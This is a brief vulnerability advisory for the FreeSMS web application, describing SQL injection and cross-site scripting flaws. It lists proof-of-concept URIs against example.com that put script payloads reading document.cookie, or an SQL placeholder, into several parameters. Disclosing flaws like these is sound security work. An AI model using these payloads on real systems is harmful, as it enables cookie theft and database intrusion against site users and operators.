FreeSMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities

FreeSMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities

An attacker can use a browser to exploit SQL-injection issue. The attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.

The following example URIs are available:

http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE}
http://www.example.com/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course='"</script><script>alert(document.cookie)</script>
http://www.example.com/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid='"</script><script>alert(document.cookie)</script>
http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script>